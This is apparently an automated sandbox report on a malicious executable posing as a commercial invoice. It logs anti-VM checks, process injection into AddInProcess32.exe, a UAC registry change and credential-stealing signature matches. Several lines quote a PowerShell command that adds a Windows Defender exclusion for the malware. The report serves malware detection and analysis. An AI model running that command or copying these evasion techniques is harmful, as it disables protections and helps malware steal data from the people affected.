                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match; File source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe; Memory allocated: 19863B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe; Memory allocated: 1987D6E0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Memory allocated: 2940000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Memory allocated: 2BF0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7529
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1989
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528; Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: Amcache.hve.8.dr; Binary or memory string: VMware
                      Source: Amcache.hve.8.dr; Binary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.8.dr; Binary or memory string: vmci.syshbin
                      Source: Amcache.hve.8.dr; Binary or memory string: VMware, Inc.
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Amcache.hve.8.dr; Binary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.8.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.8.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.8.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.8.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMWARE
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: Amcache.hve.8.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMware SVGA II
                      Source: Amcache.hve.8.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.8.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: AddInProcess32.exe, 00000004.00000002.2468385307.0000000005E00000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.8.dr; Binary or memory string: vmci.sys
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: Amcache.hve.8.dr; Binary or memory string: vmci.syshbin`
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vmware
                      Source: Amcache.hve.8.dr; Binary or memory string: \driver\vmci,\driver\pci
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: hgfsZrw6
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Amcache.hve.8.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.8.dr; Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                      Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330707407.0000019865630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, NativeMethods.cs | Reference to suspicious API methods: xVirtualProtect(address, size, newProtect, out oldProtect)
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, NativeMethods.cs | Reference to suspicious API methods: xLoadLibrary(libraryName)
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, NativeMethods.cs | Reference to suspicious API methods: xGetProcAddress(moduleHandle, procName)
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, moEk.cs | Reference to suspicious API methods: EYAPsVT.OpenProcess(CgGfQLvbm.DuplicateHandle, bInheritHandle: true, (uint)_2y5.ProcessID)
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A2F008
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Queries volume information: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe VolumeInformation
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                      Source: Amcache.hve.8.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.8.dr | Binary or memory string: msmpeng.exe
                      Source: Amcache.hve.8.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.8.dr | Binary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.2464175604.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7204, type: MEMORYSTR
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
